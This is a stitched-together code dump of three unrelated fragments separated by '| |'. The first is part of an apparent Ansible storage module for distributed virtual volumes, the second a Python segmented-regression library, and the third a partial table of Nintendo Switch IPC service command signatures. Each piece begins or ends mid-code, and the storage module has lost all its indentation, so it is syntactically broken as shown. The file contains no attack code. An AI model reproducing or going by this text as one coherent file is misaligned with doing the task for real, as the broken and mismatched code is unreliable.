for vol in self.vvol.get_virtual_volumes(clus.name)
if vol.name == name]
if len(cl_name) > 0:
return cl_name[0]
return None
def validate_name(self, name, field): # pylint: disable=R0201
"""This method validates the name length and non-presence of
special characters"""
char_len = '63'
status, msg = utils.validate_name(name, char_len, field)
if not status:
LOG.error(msg)
self.module.fail_json(msg=msg)
else:
LOG.info(msg)
def perform_module_operation(self): # pylint: disable=R0912,R0914,R0915
"""
Perform different actions on the distributed virtual volume based on
user parameters specified in the playbook
"""
state = self.module.params['state']
dist_vv_name = self.module.params['distributed_virtual_volume_name']
thin_enable = self.module.params['thin_enable']
wait_for_rebuild = self.module.params['wait_for_rebuild']
dist_dev_name = self.module.params['distributed_device_name']
dist_vv_id = self.module.params['distributed_virtual_volume_id']
newvv_name = self.module.params['new_distributed_virtual_volume_name']
expand = self.module.params['expand']
dist_vv_details = None
new_vv_details = None
dev_details = None
check_flag = False
changed = False
def exit_module(changed, dist_vv_details):
self.result["changed"] = changed
if dist_vv_details:
dist_vv_details = utils.serialize_content(dist_vv_details)
self.result["dist_vv_details"] = dist_vv_details
self.module.exit_json(**self.result)
# Check status of the cluster, whether cluster link is disabled
degraded_cluster = utils.check_status_of_cluster(self.client)
# Get distributed virtual volume details
if dist_vv_id:
dist_vv_details = self.get_dist_vv_by_id(dist_vv_id)
if dist_vv_details is not None:
dist_vv_name = dist_vv_details.name
elif dist_vv_name:
dist_vv_details = self.get_distributed_vv(dist_vv_name)
# Common check for distributed virtual volume
if state == "present" and not dist_dev_name and \
dist_vv_details is None:
if dist_vv_id:
err_msg = ("Could not find distributed virtual volume with"
" distributed_virtual_volume_id {0}".format(
dist_vv_id))
else:
err_msg = ("Could not find distributed virtual volume"
" {0}".format(dist_vv_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Delete the distributed virtual volume
if state == "absent":
if dist_vv_details is None:
if dist_vv_id:
LOG.info("Distributed virtual volume with distributed_"
"virtual_volume_id %s is not present to"
" delete", dist_vv_id)
else:
LOG.info("Distributed virtual volume %s is not present"
" to delete", dist_vv_name)
exit_module(changed, dist_vv_details)
else:
if degraded_cluster:
err_msg = ("Could not delete the distributed virtual"
" volume {0} since the cluster {1} is"
" degraded".format(
dist_vv_name, degraded_cluster))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif dist_vv_details.service_status != 'unexported':
err_msg = ("Could not delete the distributed virtual"
" volume {0} since it is exported to storage"
" view".format(dist_vv_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif dist_vv_details.consistency_group is not None:
err_msg = ("Could not delete the distributed virtual"
" volume {0} since it is added to the"
" distributed consistency group {1}".format(
dist_vv_name,
dist_vv_details.consistency_group))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Perform delete operation
changed = self.delete_distributed_vv(dist_vv_name)
dist_vv_details = None
# Create a distributed virtual volume
if state == "present" and dist_dev_name:
if newvv_name:
err_msg = ("Could not perform create and rename in a single"
" task. Please specify each operation in"
" individual task")
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dist_vv_id:
err_msg = ("Could not perform create operation with"
" distributed_virtual_volume_id parameter. Instead"
", please specify distributed_virtual_volume_name")
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for the existence of distributed virtual volume
# name in other clusters
cls_name = self.check_name_existence(dist_vv_name)
if cls_name:
err_msg = ("Could not create distributed virtual volume"
" with name {0} as it is already used in {1}."
" Please specify a different distributed"
" virtual volume name".format(
dist_vv_name, cls_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
dev_details = self.get_distributed_device(dist_dev_name)
if dev_details is None:
err_msg = ("Could not find the distributed device {0} to"
" create distributed virtual volume on top of it."
" Please provide valid distributed device"
" name".format(dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif not dev_details.virtual_volume and dist_vv_details:
err_msg = ("Could not create distributed virtual volume with"
" name {0} as it is already created on top of"
" another distributed device {1}. Please specify"
" a different distributed virtual volume"
" name".format(
dist_vv_name,
dist_vv_details.supporting_device))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dev_details.virtual_volume is not None:
vol_name = dev_details.virtual_volume.split('/')[-1]
if vol_name == dist_vv_name:
dist_vv_details = self.get_distributed_vv(vol_name)
LOG.info("Distributed virtual volume %s is already"
" created on distributed device %s",
vol_name, dist_dev_name)
check_flag = True
else:
err_msg = ("Could not create distributed virtual volume"
" with name {0} on top of distributed device"
" {1} as it already contains a distributed"
" virtual volume with name {2}".format(
dist_vv_name,
dev_details.name,
vol_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for both create/rename should not happen during cluster
# in degraded state
if not check_flag and degraded_cluster:
err_msg = ("Could not create the distributed virtual"
" volume since the cluster {0} is"
" degraded".format(degraded_cluster))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dev_details.virtual_volume is None:
if dev_details.rebuild_status in ['rebuilding', 'queued'] and \
wait_for_rebuild:
err_msg = ("Could not create the distributed virtual"
" volume as distributed device {0} is"
" rebuilding. Please try again later".format(
dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for the existence of volume in other clusters
cls_name = self.check_name_existence(dist_dev_name + "_vol")
if cls_name:
err_msg = ("Could not create distributed virtual volume"
" with name {0} as it is already used in {1}."
" Please rename the distributed device"
" {2}".format(
dist_dev_name + "_vol", cls_name,
dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Validate the distributed virtual volume name
self.validate_name(dist_vv_name,
'distributed_virtual_volume_name')
# Perform create operation
uri = "/vplex/v2/distributed_storage/distributed_devices/"
dist_vv_payload = {'device': uri + dist_dev_name,
'thin': thin_enable}
dist_vv_details = self.create_distributed_vv(dist_vv_payload)
if dist_vv_details.name != dist_vv_name:
# Perform rename operation
dist_vv_details = self.rename_distributed_vv(
dist_vv_details.name, dist_vv_name)
changed = True
# Rename the distributed virtual volume
if state == "present" and dist_vv_details and newvv_name:
if newvv_name:
if dist_vv_details.name == newvv_name:
LOG.info("Distributed virtual volume name and new"
" distributed | |
"""
Alternative implementations of segmented regression routines.
"""
# Author: <NAME>
# License: BSD 3 clause
import numpy as np
from segreg.model.alt import regression_alt, one_bkpt_segreg_alt,\
likelihood_util
try:
from numba import jit
except ImportError as e:
from segreg.mockjit import jit
# cache can fill up and also cause issues; only turn on if stable
_CACHE_NUMBA = False
##########################################################################
# Hessian
##########################################################################
def ols_terms(indep, dep, u1, u2):
    """Split the data at the two bkpts and compute OLS summary terms.

    The data is cut into three regions at u1 and u2 (indep assumed sorted
    ascending -- searchsorted is used); one set of OLS terms is returned
    per region.

    :returns: tuple of three per-region OLS term tuples
    """
    cut1 = np.searchsorted(indep, u1, side='right')
    cut2 = np.searchsorted(indep, u2, side='right')
    regions = ((indep[0:cut1], dep[0:cut1]),
               (indep[cut1:cut2], dep[cut1:cut2]),
               (indep[cut2:], dep[cut2:]))
    return tuple(regression_alt.ols_terms(x, y) for x, y in regions)
def rss(params, ols_data1, ols_data2, ols_data3):
    """Total residual sum of squares of the segmented fit.

    params = [u1, v1, u2, v2, m1, m2]; the middle-segment slope is implied
    by the two breakpoints. Each ols_data* holds the OLS summary terms of
    the corresponding region.
    """
    u1, v1, u2, v2, m1, m2 = params
    mid_slope = (v2 - v1) / (u2 - u1)
    segments = (([u1, v1, m1], ols_data1),
                ([u1, v1, mid_slope], ols_data2),
                ([u2, v2, m2], ols_data3))
    return sum(likelihood_util.rss_line_segment(seg_params, seg_data)
               for seg_params, seg_data in segments)
def two_bkpt_loglik(params, indep, dep):
    """Log-likelihood of a two-bkpt segmented regression model.

    Parameters
    ----------
    params: list
        [u1, v1, u2, v2, m1, m2, residual_variance]
    indep: array-like
        independent data
    dep: array-like
        dependent data
    """
    u1, v1, u2, v2, m1, m2, resid_variance = params
    terms1, terms2, terms3 = ols_terms(indep=indep, dep=dep, u1=u1, u2=u2)
    total_rss = rss(params=[u1, v1, u2, v2, m1, m2],
                    ols_data1=terms1,
                    ols_data2=terms2,
                    ols_data3=terms3)
    # first entry of each terms tuple is the region's data count
    num_data = terms1[0] + terms2[0] + terms3[0]
    return likelihood_util.loglikelihood(rss=total_rss,
                                         resid_variance=resid_variance,
                                         num_data=num_data)
def _two_bkpt_loglik2(params, indep, dep):
    """
    Same computation as two_bkpt_loglik, with a different params ordering.

    Parameters
    ----------
    params: list
        [u1, u2, v1, v2, m1, m2, residual_variance]
    indep: array-like
        independent data
    dep: array-like
        dependent data
    """
    u1, u2, v1, v2, m1, m2, resid_variance = params
    # Reorder into the canonical [u1, v1, u2, v2, ...] layout and delegate.
    return two_bkpt_loglik([u1, v1, u2, v2, m1, m2, resid_variance],
                           indep,
                           dep)
##########################################################################
# End Hessian
##########################################################################
def segmented_func_impl(x, params):
    """Evaluate a two-bkpt piecewise-linear function at the points *x*.

    params = (u1, v1, u2, v2, m1, m2) where (u1, v1) and (u2, v2) are the
    breakpoints, m1 the slope left of u1 and m2 the slope right of u2; the
    middle-segment slope is determined by the two breakpoints.

    PARAMETERS
    ----------
    x: array-like (non-scalar)
        evaluation points, in any order

    :returns: ndarray of function values aligned with the input order
    """
    # TODO: REMEMBER THIS FUNCTION GIVES ODD RESULTS WITH INTEGER INPUT
    x_arr = np.array(x, dtype=float)
    u1, v1, u2, v2, m1, m2 = params
    mid_slope = (v2 - v1) / (u2 - u1)
    # Sort so each region is a contiguous slice.
    argsort_inds = x_arr.argsort()
    sorted_arr = x_arr[argsort_inds]
    first = sorted_arr[sorted_arr <= u1]
    second = sorted_arr[np.logical_and(u1 < sorted_arr, sorted_arr <= u2)]
    third = sorted_arr[u2 < sorted_arr]
    first_vals = v1 + m1 * (first - u1)
    second_vals = v1 + mid_slope * (second - u1)
    third_vals = v2 + m2 * (third - u2)
    sorted_result = np.concatenate((first_vals, second_vals, third_vals))
    # BUG FIX: restore the caller's ordering with the INVERSE permutation.
    # The old code did `sorted_result[argsort_inds]`, which applies the
    # forward permutation a second time and scrambles the output whenever
    # the input is not already sorted (or exactly reverse-sorted).
    result = np.empty_like(sorted_result)
    result[argsort_inds] = sorted_result
    return result
# TODO: duped: get rid of this impl
def segmented_func(x, params):
    """Scalar-or-array front end for segmented_func_impl."""
    if np.isscalar(x):
        return segmented_func_impl([x], params)[0]
    return segmented_func_impl(x, params)
# NOTE: bug in numpy? does not work when three or more conditions and input
# is a scalar
def segmented_funcORIG(x, params):
    """Legacy np.piecewise-based evaluation of the segmented function.

    Apparently superseded by segmented_func / segmented_func_impl (see the
    "duped" TODO above); prints debug output to stdout on every call, so it
    is not suitable for production use.
    """
    # TODO: REMEMBER THIS FUNCTION GIVES ODD RESULTS WITH INTEGER INPUT
    x_arr = np.array(x, dtype=float)
    u1, v1, u2, v2, m1, m2 = params
    mid_slope = (v2 - v1) / (u2 - u1)
    # NOTE(review): `first` is computed but never used -- looks like a
    # debugging leftover.
    first = x_arr[x_arr <= u1]
    print("IN FUNC")
    print(u2 < x_arr)
    print("VAL: ", v2 + m2 * (x - u2))
    print()
    # Three regions: left of u1, between the bkpts, right of u2.
    return np.piecewise(x_arr,
                        [x_arr <= u1,
                         np.logical_and(u1 < x_arr, x_arr <= u2),
                         u2 < x_arr],
                        [lambda z: v1 + m1 * (z - u1),
                         lambda z: v1 + mid_slope * (z - u1),
                         lambda z: v2 + m2 * (z - u2)])
@jit(nopython=True)
def fixed_bkpt_ls_regression(indep, dep, u1, u2):
    """
    Pure python implementation of the main cython impl:
    two_bkpt_segreg.fixed_bkpt_least_squares
    Segmented function params: (u1,v1,u2,v2,m1,m2), where (u1,v1) and (u2,v2)
    are breakpoints, and m1,m2 are the slope of the line segments in regions
    1 and 3 (the slope in region 2 being determined)
    This implementation uses the regression formula Section 5.1.1 of
    "Segmented Regression" by <NAME>. It gives the same answer as
    the method fixed_bkpt_ls
    """
    # First index strictly past each bkpt (assumes indep is sorted
    # ascending -- TODO confirm at call sites).
    index1 = np.searchsorted(indep, u1, side='right')
    index2 = np.searchsorted(indep, u2, side='right')
    data_shiftu1 = indep - u1
    data_shiftu2 = indep - u2
    diff = u2 - u1
    # Design-matrix columns for the parameter vector (v1, v2, m1, m2):
    # data0/data1 interpolate linearly between the bkpts inside region 2
    # and are constant (1 resp. 0) outside it; data2/data3 carry the
    # region-1 and region-3 slopes and vanish elsewhere.
    data0 = 1.0 - np.copy(data_shiftu1) / diff
    data0[0:index1] = 1.0
    data0[index2:] = 0.0
    data1 = np.copy(data_shiftu1) / diff
    data1[0:index1] = 0.0
    data1[index2:] = 1.0
    data2 = np.copy(data_shiftu1)
    data2[index1:] = 0.0
    data3 = np.copy(data_shiftu2)
    data3[0:index2] = 0.0
    data = np.vstack((data0, data1, data2, data3))
    data = data.T
    # matrix mult by hand faster than canned OLS routines
    dep = dep.reshape(-1, 1)
    v1, v2, m1, m2 = regression_alt.mat_by_hand_ols(data, dep)
    return v1, v2, m1, m2
@jit(nopython=True)
def fixed_bkpt_ls_from_data(indep, dep, u1, u2):
    """Fixed-bkpt least squares computed straight from raw data.

    Splits the data at the bkpts u1, u2 (indep assumed sorted ascending),
    computes per-region OLS summary terms, and delegates to fixed_bkpt_ls.
    """
    cut1 = np.searchsorted(indep, u1, side='right')
    cut2 = np.searchsorted(indep, u2, side='right')
    terms_left = regression_alt.ols_terms(indep[0:cut1], dep[0:cut1])
    terms_mid = regression_alt.ols_terms(indep[cut1:cut2], dep[cut1:cut2])
    terms_right = regression_alt.ols_terms(indep[cut2:], dep[cut2:])
    return fixed_bkpt_ls(terms_left, terms_mid, terms_right, u1, u2)
@jit(nopython=True, cache=False)
def fixed_bkpt_ls(ols_terms_1, ols_terms_2, ols_terms_3, u1, u2):
"""
Pure python implementation of the main cython impl:
two_bkpt_segreg.fixed_bkpt_least_squares
Segmented function params: (u1,v1,u2,v2,m1,m2), where (u1,v1) and (u2,v2)
are breakpoints, and m1,m2 are the slope of the line segments in regions
1 and 3 (the slope in region 2 being determined)
NOTES
-----
The notation below follows the document
"Segmented Regression" by <NAME>
"""
num_data_1, sum_x_1, sum_y_1, sum_xx_1, sum_yy_1, sum_xy_1 = ols_terms_1
num_data_2, sum_x_2, sum_y_2, sum_xx_2, sum_yy_2, sum_xy_2 = ols_terms_2
num_data_3, sum_x_3, sum_y_3, sum_xx_3, sum_yy_3, sum_xy_3 = ols_terms_3
u1_sq = u1 * u1
u2_sq = u2 * u2
two_u1 = 2.0 * u1
two_u2 = 2.0 * u2
diff = u2 - u1
diff_sq = diff * diff
A1 = sum_y_1
A2 = sum_y_2
A3 = sum_y_3
B11 = sum_xy_1 - u1 * A1
B22 = sum_xy_2 - u2 * A2
B21 = sum_xy_2 - u1 * A2
B32 = sum_xy_3 - u2 * A3
C11 = sum_x_1 - u1 * num_data_1
C21 = sum_x_2 - u1 * num_data_2
C32 = sum_x_3 - u2 * num_data_3
D11 = sum_xx_1 - two_u1 * sum_x_1 + u1_sq * num_data_1
D22 = sum_xx_2 - two_u2 * sum_x_2 + u2_sq * num_data_2
D21 = sum_xx_2 - two_u1 * sum_x_2 + u1_sq * num_data_2
D32 = sum_xx_3 - two_u2 * sum_x_3 + u2_sq * num_data_3
E = sum_yy_1 + sum_yy_2 + sum_yy_3
F2 = sum_xx_2 - (u1 + u2) * sum_x_2 + u1 * u2 * num_data_2
##
term = D21 / diff_sq
a = -num_data_1 + C11 * C11 / D11 - D22 / diff_sq
b = F2 / diff_sq
c = b
d = -num_data_3 + C32 * C32 / D32 - term
e = -A1 + B11 * C11 / D11 + B22 / diff
f = -A3 + B32 * C32 / D32 - B21 / diff
# v estimates
v1, v2 = regression_alt.invert_two_by_two(a, b, c, d, e, f)
## BEGIN: slopes
m1 = (B11 - v1 * C11) / D11
m2 = (B32 - v2 * C32) / D32
## END: slopes
m = (v2 - v1) / (u2 - u1)
two_v1 = 2.0 * v1
two_v2 = 2.0 * v2
rss = (E - two_v1 * (A1 + A2) - two_v2 * A3
- 2.0 * m1 * B11 - 2.0 * m * B21 - 2.0 * m2 * B32
+ v1 * v1 * (num_data_1 + num_data_2) + v2 * v2 * num_data_3
+ two_v1 * (m1 * C11 + m * C21) + two_v2 * m2 * C32
+ m1 * m1 * D11 + m * m * D21 + m2 * m2 * D32)
return v1, v2, m1, m2, rss
@jit(nopython=True, cache=_CACHE_NUMBA)
def estimate_two_bkpt_segreg(indep,
dep,
num_end_to_skip=3,
num_between_to_skip=4,
verbose=False,
optimize=True):
"""
Estimate two-bkpt segmented regression model.
This method is limited to univariate, continuous, linear, | |
bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 3, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 4, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::es::IETicketService', 5, '0 bytes in - 0 bytes out'),
('nn::es::IETicketService', 6, '0 bytes in - 0 bytes out'),
('nn::es::IETicketService', 7, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::es::IETicketService', 8, ''),
('nn::es::IETicketService', 9, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::es::IETicketService', 10, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::es::IETicketService', 11, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::es::IETicketService', 12, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::es::IETicketService', 13, ''),
('nn::es::IETicketService', 14, ''),
('nn::es::IETicketService', 15, ''),
('nn::es::IETicketService', 16, ''),
('nn::es::IETicketService', 17, ''),
('nn::es::IETicketService', 18, ''),
('nn::es::IETicketService', 19, ''),
('nn::es::IETicketService', 20, ''),
('nn::es::IETicketService', 21, ''),
('nn::eth::sf::IEthInterface', 0, ''),
('nn::eth::sf::IEthInterface', 1, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterface', 2, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterface', 3, ''),
('nn::eth::sf::IEthInterface', 4, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::eth::sf::IEthInterface', 5, ''),
('nn::eth::sf::IEthInterfaceGroup', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::eth::sf::IEthInterfaceGroup', 1, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterfaceGroup', 2, '0 bytes in - 0 bytes out'),
('nn::eth::sf::IEthInterfaceGroup', 3, ''),
('nn::eth::sf::IEthInterfaceGroup', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::eupld::sf::IControl', 0, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IControl', 1, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IControl', 2, ''),
('nn::eupld::sf::IControl', 3, ''),
('nn::eupld::sf::IRequest', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::eupld::sf::IRequest', 1, '0 bytes in - 0 bytes out'),
('nn::eupld::sf::IRequest', 2, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::eupld::sf::IRequest', 3, '0 bytes in - 0 bytes out - Buffer<0,6,0>'),
('nn::eupld::sf::IRequest', 4, '0 bytes in - 0 bytes out'),
('nn::eupld::sf::IRequest', 5, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 0, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::fan::detail::IController', 1, '4 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<4,4,0>'),
('nn::fan::detail::IController', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IController', 3, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::fan::detail::IController', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IController', 5, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 6, '0 bytes in - 0 bytes out'),
('nn::fan::detail::IController', 7, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fan::detail::IManager', 0, '4 bytes in - 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::fatalsrv::IPrivateService', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::fatalsrv::IService', 0, ''),
('nn::fatalsrv::IService', 1, ''),
('nn::fatalsrv::IService', 2, ''),
('nn::fgm::sf::IDebugger', 0, '8 bytes in - 0 bytes out - OutHandle<0,1>, InHandle<0,1>, InRaw<8,8,0>'),
('nn::fgm::sf::IDebugger', 1, '0 bytes in - 0xC bytes out - Buffer<0,6,0>, OutRaw<4,4,0>, OutRaw<4,4,4>, OutRaw<4,4,8>'),
('nn::fgm::sf::IDebugger', 2, '0 bytes in - 0 bytes out'),
('nn::fgm::sf::IRequest', 0, '0x10 bytes in - 0 bytes out - takes pid - OutHandle<0,1>, InRaw<4,4,0>, InRaw<8,8,8>'),
('nn::fgm::sf::IRequest', 1, '8 bytes in - 0 bytes out - InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::fgm::sf::IRequest', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::fgm::sf::IRequest', 3, '0 bytes in - 0 bytes out'),
('nn::fgm::sf::ISession', 0, '0 bytes in - 0 bytes out - OutObject<0,0>'),
('nn::friends::detail::ipc::IFriendService', 0, '0 bytes in - 0 bytes out - OutHandle<0,1>'),
('nn::friends::detail::ipc::IFriendService', 1, '0 bytes in - 0 bytes out'),
('nn::friends::detail::ipc::IFriendService', 10100, '0x30 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, Buffer<0,0xA,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<0x10,8,0x18>, InRaw<8,8,0x28>'),
('nn::friends::detail::ipc::IFriendService', 10101, '0x30 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<0x10,8,0x18>, InRaw<8,8,0x28>'),
('nn::friends::detail::ipc::IFriendService', 10102, '0x18 bytes in - 0 bytes out - takes pid - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 10110, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,6,0>'),
('nn::friends::detail::ipc::IFriendService', 10200, '0x20 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, InRaw<8,8,0x10>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, InRaw<8,8,0x18>'),
('nn::friends::detail::ipc::IFriendService', 10211, '0x80 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0x68>, InRaw<0x40,1,0>, InRaw<0x21,1,0x40>, Buffer<2,5,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, InRaw<8,8,0x78>'),
('nn::friends::detail::ipc::IFriendService', 10400, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 10500, '0x10 bytes in - 0 bytes out - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>'),
('nn::friends::detail::ipc::IFriendService', 10600, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 10601, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 10610, '0x18 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, Buffer<0,0x19,0xE0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 10700, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<0x10,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 10701, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<8,8,8>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 10702, '0x18 bytes in - 0 bytes out - takes pid - InRaw<0x10,8,0>, Buffer<0,0x19,0x40>, Buffer<1,0x19,0x48>, Buffer<2,0x19,0x48>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 11000, '0xA4 bytes in - 0xA0 bytes out - OutRaw<0xA0,1,0>, InRaw<0xA0,1,0>, InRaw<4,4,0xA0>'),
('nn::friends::detail::ipc::IFriendService', 20100, '0x28 bytes in - 4 bytes out - takes pid - OutRaw<4,4,0>, InRaw<0x10,8,0>, InRaw<0x10,8,0x10>, InRaw<8,8,0x20>'),
('nn::friends::detail::ipc::IFriendService', 20101, '0x10 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20102, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x800>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20103, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20104, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20110, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x40>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20200, '0x10 bytes in - 8 bytes out - OutRaw<4,4,0>, OutRaw<4,4,4>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20201, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::friends::detail::ipc::IFriendService', 20300, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20301, '0x18 bytes in - 4 bytes out - Buffer<0,0x1A,0x38>, OutRaw<4,4,0>, Buffer<1,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20400, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20401, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20500, '0x10 bytes in - 0 bytes out - Buffer<0,6,0>, InRaw<0x10,8,0>, Buffer<1,9,0>'),
('nn::friends::detail::ipc::IFriendService', 20501, '0x18 bytes in - 8 bytes out - OutRaw<8,1,0>, InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 20600, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0xE0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20700, '0x18 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>, InRaw<0x10,8,8>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 20701, '0x10 bytes in - 0x10 bytes out - OutRaw<0x10,8,0>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20800, '0x10 bytes in - 0 bytes out - Buffer<0,0x1A,0x800>, InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20801, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 20900, '0 bytes in - 0 bytes out'),
('nn::friends::detail::ipc::IFriendService', 21000, '0x18 bytes in - 0 bytes out - Buffer<0,0x1A,0x4B8>, InRaw<0x10,8,8>, InRaw<8,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30100, '0x10 bytes in - 0 bytes out - InRaw<0x10,8,0>'),
('nn::friends::detail::ipc::IFriendService', 30101, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30110, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30120, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30121, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<1,1,0>'),
('nn::friends::detail::ipc::IFriendService', 30200, '0x20 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>'),
('nn::friends::detail::ipc::IFriendService', 30201, '0x30 bytes in - 0 bytes out - InRaw<0x10,8,8>, InRaw<8,8,0x18>, InRaw<4,4,0>, InRaw<0x10,8,0x20>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::friends::detail::ipc::IFriendService', 30202, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30203, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30204, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
('nn::friends::detail::ipc::IFriendService', 30205, '0x18 bytes in - 0 bytes out - InRaw<0x10,8,0>, InRaw<8,8,0x10>'),
